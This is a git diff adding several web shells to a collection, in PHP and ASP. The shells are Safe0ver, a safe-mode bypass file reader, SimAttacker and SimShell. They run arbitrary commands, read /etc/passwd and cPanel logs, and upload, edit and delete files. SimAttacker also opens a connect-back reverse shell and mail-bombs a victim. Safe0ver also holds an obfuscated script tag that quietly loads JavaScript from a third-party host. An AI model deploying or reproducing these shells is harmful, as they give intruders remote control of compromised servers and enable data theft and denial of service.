+         else {
+             $objname = "Filename";
+             $objident = "file";
+         }
+     }
+       echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
+    If (empty($newfile) != true) {
+         echo "<center>";
+         $return = @rename($oldfile, "$olddir$newfile");
+        if ($return) {
+             echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
+         }
+         else {
+             if ( @file_exists("$olddir$newfile") ) {
+                 echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
+             }
+             else {
+                 echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
+             }
+          }
+         echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
+     }
+     else {
+         $dpos = strrpos($oldfile, "/");
+         if (strval($dpos)!="") {
+             $olddir = substr($oldfile, 0, $dpos+1);
+           }
+         else {
+             $olddir = "$lastdir/";
+        }
+         $fpos = strrpos($oldfile, "/");
+         if (strval($fpos)!="") {
+             $inputfile = substr($oldfile, $fpos+1);
+           }
+         else {
+             $inputfile = "";
+         }
+               echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+         echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
+         echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
+         echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
+         echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
+         echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
+         echo "Rename \"$oldfile\" to:<br>\n";
+         echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; 
+        echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
+         echo "</td></tr></table></center>";
+     }
+}
+else if ( $cmd == "con") {
+
+?>
+<center>
+<table>
+ <tr><td>&nbsp;</td>
+ </tr></table>
+<?php
+}    
+else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
+    $isMainMenu = true;
+     ?>
+    <table width="100%" border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="border">
+       <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
+      </td>
+     </tr>
+    </table>
+    <br>
+     <center>
+    <table border="0" NOWRAP>
+      <tr>
+      <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?>      </td>
+       <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullanım:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
+        </span></td>
+     </tr>
+       </table>
+    <br><p><br>Safe Mode ByPAss<p><form method="POST">
+	<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
+	<input type="submit" value="Çalistir"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="dizin">
+                <option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
+		<option value="cat /etc/passwd">cat /etc/passwd</option>
+		<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
+		<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
+		<option value="cat /etc/hosts">cat /etc/hosts</option>
+                <option value="cat /etc/named.conf">cat /etc/named.conf</option>
+                <option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
+                <option value="netstat -an | grep -i listen">Açik Portlar</option>
+                <option value="ps -aux">Çalisan Uygulamalar</option>
+</select> <input type="submit" value="Çalistir"></p>
+	</form>
+------------------------------------------------------------------------------------<p>
+<?
+$evilc0der=$_POST['dizin'];
+if($_POST['dizin'])
+{
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$safemodgec = shell_exec($evilc0der);
+echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
+}
+?>
+<Script Language='Javascript'>
+<!-- HTML Encryption provided by iWEBTOOL.com -->
+<!--
+document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%63%30%64%65%72%2E%6F%72%67%2F%6C%6F%67%7A%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
+//-->
+</Script>
+</center>
+    <br>
+     <?php
+}
+
+if ($cmd != "downl") {
+    if ( $isMainMenu != true) {
+         ?>
+
+		<table width="100%" border="0" cellpadding="0" cellspacing="0">
+         <tr>
+          <td width="100%" style="class="silver border">
+           <center><strong>
+            &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=");      ?>&nbsp;&nbsp;
+            &nbsp;&nbsp;&nbsp;&nbsp;
+                    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;]  </font>", "cmd=dir&dir=.");  ?> &nbsp;&nbsp;
+            </strong></center>
+          </td>
+         </tr>
+        </table>
+        <br>
+        <?php
+}
+    ?>
+    <table width=100% border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="silver border">
+       <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+      </td>
+     </tr>
+    </table>
+        </td>
+  </tr>
+ </table>
+
+  <?php
+ }
+
+?> 
+
+
+
+
+ 
+
+
+
+
+
diff --git a/138shell/S/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt b/138shell/S/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt
new file mode 100644
index 0000000..ac5dc38
--- /dev/null
+++ b/138shell/S/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt	
@@ -0,0 +1,89 @@
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+</head>
+<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
+<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Verdana" size="5" color="#DADADA"><a href="?	"><span style="color: #DADADA; text-decoration: none; font-weight:700"><font face="Times New Roman">Safe 
+Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
+<form method="POST">
+	<p align="center"><input type="text" name="file" size="20">
+	<input type="submit" value="Open" name="B1"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="file">
+		<option value="/etc/passwd">Get /etc/passwd</option>
+		<option value="/var/cpanel/accounting.log">View cpanel logs</option>
+		<option value="/etc/syslog.conf">Syslog configuration</option>
+		<option value="/etc/hosts">Hosts</option>
+		</select> <input type="submit" value="Go" name="B1"></p>
+	</form>
+
+
+<?php
+/*
+Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
+by PHP Emperor<xb5@hotmail.com>
+*/
+
+echo "<head><title>Safe Mode Shell</title></head>"; 
+
+
+
+
+$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
+
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+echo "<PRE>\n";
+if(empty($file)){
+if(empty($_GET['file'])){
+if(empty($_POST['file'])){
+die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n <B><CENTER><FONT
+COLOR=\"RED\">PHP Emperor
+xb5@hotmail.com</FONT></CENTER></B>");
+} else {
+$file=$_POST['file'];
+}
+} else {
+$file=$_GET['file'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$file, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "<B>--- Start File ".htmlspecialchars($file)."
+-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
+".htmlspecialchars($file)." ---------------\n";
+unlink($temp);
+die("\n<FONT COLOR=\"RED\"><B>File
+".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
+;]</B></FONT>");
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+?>
\ No newline at end of file
diff --git a/138shell/S/Server Variables.asp.txt b/138shell/S/Server Variables.asp.txt
new file mode 100644
index 0000000..e9b0318
--- /dev/null
+++ b/138shell/S/Server Variables.asp.txt	
@@ -0,0 +1,27 @@
+<%
+Dim Vars
+%>
+
+<p>&nbsp;</p>
+<p>&nbsp;</p>
+<p><font size="2" face="Arial, Helvetica, sans-serif"><strong>A list of all server 
+  variables : </strong> </font></p>
+<p><BR>
+  <BR>
+</p>
+<TABLE width="75%" BORDER=1 align="center" cellpadding="3" cellspacing="0">
+  <TR> 
+    <TD width="149"><p><font size="2" face="Arial, Helvetica, sans-serif"><B>Server 
+        Variable Name</B></font></p>
+      </TD>
+    <TD width="333"><p><font size="2" face="Arial, Helvetica, sans-serif"><B>Server 
+        Variable Value</B></font></p>
+      </TD>
+  </TR>
+  <% For Each Vars In Request.ServerVariables %>
+  <TR> 
+    <TD><FONT SIZE="1" face="Arial, Helvetica, sans-serif"><%= Vars %></FONT></TD>
+    <TD><FONT SIZE="1" face="Arial, Helvetica, sans-serif"><%= Request.ServerVariables(Vars) %>&nbsp;</FONT></TD>
+  </TR>
+  <% Next %>
+</TABLE>
diff --git a/138shell/S/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt b/138shell/S/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt
new file mode 100644
index 0000000..9d41bb6
--- /dev/null
+++ b/138shell/S/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt	
@@ -0,0 +1,378 @@
+<?
+//download Files  Code
+$fdownload=$_GET['fdownload'];
+if ($fdownload <> "" ){
+// path & file name
+$path_parts = pathinfo("$fdownload");
+$entrypath=$path_parts["basename"];
+$name = "$fdownload";
+$fp = fopen($name, 'rb');
+header("Content-Disposition: attachment; filename=$entrypath");
+header("Content-Length: " . filesize($name));
+fpassthru($fp);
+exit;
+}
+?>
+	
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
+<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
+<style>
+<!--
+body         { font-family: Tahoma; font-size: 8pt }
+-->
+</style>
+</head>
+<body>
+<?
+error_reporting(E_ERROR | E_WARNING | E_PARSE);
+
+ //File Edit
+ $fedit=$_GET['fedit'];
+ if ($fedit <> "" ){
+ $fedit=realpath($fedit);
+ $lines = file($fedit);
+ echo "<form action='' method='POST'>";
+echo "<textarea name='savefile' rows=30 cols=80>" ;
+foreach ($lines as $line_num => $line) {
+ echo htmlspecialchars($line);
+}
+echo "</textarea>
+	<input type='text' name='filepath'  size='60' value='$fedit'>
+	<input type='submit' value='save'></form>";
+	$savefile=$_POST['savefile'];
+	$filepath=realpath($_POST['filepath']);
+	if ($savefile <> "") 
+	{
+	$fp=fopen("$filepath","w+");
+	fwrite ($fp,"") ;
+	fwrite ($fp,$savefile) ;
+	fclose($fp);
+	echo "<script language='javascript'> close()</script>";
+	}
+exit();
+ }
+?>
+<?
+// CHmod - PRimission
+$fchmod=$_GET['fchmod'];
+if ($fchmod <> "" ){
+$fchmod=realpath($fchmod);
+echo "<center><br>
+chmod for :$fchmod<br>
+<form method='POST' action=''><br>
+Chmod :<br>
+<input type='text' name='chmod0' ><br>
+<input type='submit' value='change chmod'>
+</form>";
+$chmod0=$_POST['chmod0'];
+if ($chmod0 <> ""){
+chmod ($fchmod , $chmod0);
+}else {
+echo "primission Not Allow change Chmod";
+}
+exit();
+}
+?>
+	
+<div align="center">
+	<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
+		<tr>
+			<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
+				<p align="center"><b>
+				<font face="Tahoma" size="2"><br>
+				</font>
+				<font color="#D2D200" face="Tahoma" size="2">
+				<span style="text-decoration: none">
+				<font color="#000000">
+				<a href="?id=fm&dir=<?
+	echo getcwd();
+	?>
+	">
+				<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
+				<p align="center"><b><a href="?id=cmd">
+				<span style="text-decoration: none">
+				<font face="Tahoma" size="2" color="#000000">
+				CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
+				<p align="center"><b><a href="?id=fake-mail">
+				<font face="Tahoma" size="2" color="#000000">
+				<span style="text-decoration: none">Fake mail</span></font></a></b></p>
+				<p align="center"><b>
+				<font face="Tahoma" size="2" color="#000000">
+				<a href="?id=cshell">
+				<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
+				<p align="center"><b>
+				<font color="#000000" face="Tahoma" size="2">
+				<a href="?id=">
+				<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
+				<p>&nbsp;<p align="center">&nbsp;</td>
+			<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
+			<?
+			//*******************************************************
+			//Start Programs About US
+			$id=$_GET['id'];
+
+			if ($id=="") {
+			echo "
+			<font face='Arial Black' color='#808080' size='1'>
+***************************************************************************<br>
+&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
+&nbsp;Programer : Hossein Asgary <br>
+&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
+&nbsp;please : If you find bug or problems in program , tell me by : <br>
+&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
+Enjoy :) [Only 4 Best Friends ] <br>
+***************************************************************************</font></span></p>
+";
+
+echo "<font color='#333333' size='2'>OS :". php_uname();
+echo "<br>IP :". 
+($_SERVER['REMOTE_ADDR']);
+echo "</font>";
+
+
+			}
+			//************************************************************
+			//cmd-command line
+			$cmd=$_POST['cmd'];
+			if($id=="cmd"){
+		$result=shell_exec("$cmd");
+		echo "<br><center><h3> CMD ExeCute </h3></center>" ;
+		echo "<center>
+		<textarea rows=20 cols=70 >$result</textarea><br>
+		<form method='POST' action=''>
+		<input type='hidden' name='id' value='cmd'>
+		<input type='text' size='80' name='cmd' value='$cmd'>
+		<input type='submit' value='cmd'><br>";
+			
+			
+			
+			}
+			
+		//********************************************************	
+		
+		//fake mail = Use victim server 4 DOS - fake mail 
+		if ( $id=="fake-mail"){
+		error_reporting(0);
+		echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
+		echo "<center><form method='post' action=''>
+		Victim Mail :<br><input type='text' name='to' ><br>
+		Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
+		Comments:
+		<br>
+		<textarea rows='10' cols=50 name='Comments' ></textarea><br>
+		<input type='submit' value='Send Mail Strm ' >
+		</form></center>";
+		//send Storm Mail
+		$to=$_POST['to'];
+		$nom=$_POST['nom'];
+		$Comments=$_POST['Comments'];
+		if ($to <> "" ){
+		for ($i = 0; $i < $nom ; $i++){
+		$from = rand (71,1020000000)."@"."Attacker.com";
+		$subject= md5("$from");
+        mail($to,$subject,$Comments,"From:$from");
+        echo "$i is ok";
+        }      
+        echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
+        }
+		}
+		//********************************************************
+
+			//Connect Back -Firewall Bypass
+			if ($id=="cshell"){
+			echo "<br>Connect back Shell , bypass Firewalls<br>
+			For user :<br>
+			nc -l -p 1019 <br>
+			<hr>
+			<form method='POST' action=''><br>
+			Your IP & BindPort:<br>
+			<input type='text' name='mip' >
+			<input type='text' name='bport' size='5' value='1019'><br>
+			<input type='submit' value='Connect Back'>
+			</form>";
+		 $mip=$_POST['mip'];
+		 $bport=$_POST['bport'];
+		 if ($mip <> "")
+		 {
+		 $fp=fsockopen($mip , $bport , $errno, $errstr);
+		 if (!$fp){
+		       $result = "Error: could not open socket connection";
+		 }
+		 else {
+		 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
+	  while(!feof($fp)){ 
+       fputs ($fp," bash # ");
+       $result= fgets ($fp, 4096);
+      $message=`$result`;
+       fputs ($fp,"--> ".$message."\n");
+      }
+      fclose ($fp);
+		 }
+		 }
+			}
+			
+		//********************************************************
+			//Spy File Manager
+			$homedir=getcwd();
+			$dir=realpath($_GET['dir'])."/";
+			if ($id=="fm"){
+			echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 
+                  &nbsp;<b>
+                  <form action='' method='GET'>
+                  &nbsp;Path:</b>
+                  <input type='hidden' name='id' value='fm'>
+                  <input type='text' name='dir' size='80' value='$dir'>
+                  <input type='submit' value='dir'>
+                  </form>
+                 <br>";
+
+			echo "
+
+<div align='center'>
+
+<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
+	<tr>
+		<td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
+		<td height='28' width='82' align='center'>
+		<font color='#000080' size='2'><b>Size KByte</b></font></td>
+		<td height='28' width='83' align='center'>
+		<font color='#008000' size='2'><b>Download</b></font></td>
+		<td height='28' width='66' align='center'>
+		<font color='#FF9933' size='2'><b>Edit</b></font></td>
+		<td height='28' width='75' align='center'>
+		<font color='#999999' size='2'><b>Chmod</b></font></td>
+		<td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
+	</tr>";
+		    if (is_dir($dir)){
+		    if ($dh=opendir($dir)){
+		    while (($file = readdir($dh)) !== false) {
+		    $fsize=round(filesize($dir . $file)/1024);
+		
+		    
+	echo " 
+	<tr>
+		<th width='250' height='22' align='left' nowrap>";
+		if (is_dir($dir.$file))
+		{
+		echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
+		}
+		else {
+		echo "<font size='2' color='#666666'>&nbsp;$file ";
+		}
+		echo "</a></font></th>
+		<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
+		if (is_file($dir.$file))
+		{
+		echo "$fsize";
+		}
+		else {
+		echo "&nbsp; ";
+		}
+		echo "
+		</b></font></td>
+		<td width='103' align='center' nowrap>";
+		if (is_file($dir.$file)){
+		if (is_readable($dir.$file)){
+		echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
+		}else {
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+		 }
+		}else {
+		echo "&nbsp;";
+		 }
+		echo "
+		</a></font></td>
+		<td width='77' align='center' nowrap>";
+		if (is_file($dir.$file))
+		{
+		if (is_readable($dir.$file)){
+		echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
+		}else {
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+		 }
+		}else {
+		echo "&nbsp;";
+		 }
+		echo "
+		</a></font></td>
+		<td width='86' align='center' nowrap>";
+		if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+		echo "<font size='1' color='#999999'>Dont in windows";
+		}
+		else {
+		echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
+		}
+		echo "</a></font></td>
+		<td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
+	</tr>
+	";
+		      }
+		      closedir($dh);
+		    } 
+		    }
+		    echo "</table>
+<form enctype='multipart/form-data' action='' method='POST'>
+ <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
+ Send this file: <input name='userfile' type='file' />
+ <inpt type='hidden' name='Fupath'  value='$dir'>
+ <input type='submit' value='Send File' />
+</form> 
+		    </div>";
+			}
+//Upload Files 
+$rpath=$_GET['dir'];
+if ($rpath <> "") {
+$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
+print "<pre>";
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
+echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
+echo "<script language='javascript'> history.back(2)</script>";
+}
+ }
+ //file deleted
+$frpath=$_GET['fdelete'];
+if ($frpath <> "") {
+if (is_dir($frpath)){
+$matches = glob($frpath . '/*.*');
+if ( is_array ( $matches ) ) {
+  foreach ( $matches as $filename) {
+  unlink ($filename);
+  rmdir("$frpath");
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+echo "<script language='javascript'> history.back(1)</script>";
+  }
+  }
+  }
+  else{
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+unlink ("$frpath");
+echo "<script language='javascript'> history.back(1)</script>";
+exit(0);
+
+  }
+  
+
+}
+			?>
+			
+			</td>
+		</tr>
+		<tr>
+			<td style="border: 1px dotted #FFCC66">
+			<p align="center"><font color="#666666" size="1" face="Tahoma"><br>
+			Copyright 2004-Simorgh Security<br>
+			Hossein-Asgari<br>
+			</font><font color="#c0c0c0" size="1" face="Tahoma">
+		<a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
+		<font color="#666666">www.simorgh-ev.com</font></a></font></td>
+		</tr>
+	</table>
+</div>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/138shell/S/SimShell 1.0 - Simorgh Security MGZ.txt b/138shell/S/SimShell 1.0 - Simorgh Security MGZ.txt
new file mode 100644
index 0000000..2fff063
--- /dev/null
+++ b/138shell/S/SimShell 1.0 - Simorgh Security MGZ.txt	
@@ -0,0 +1,180 @@
+<?php
+
+/*Simorgh Security Magazine */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>SimShell - Simorgh Security MGZ</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #000000">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
+
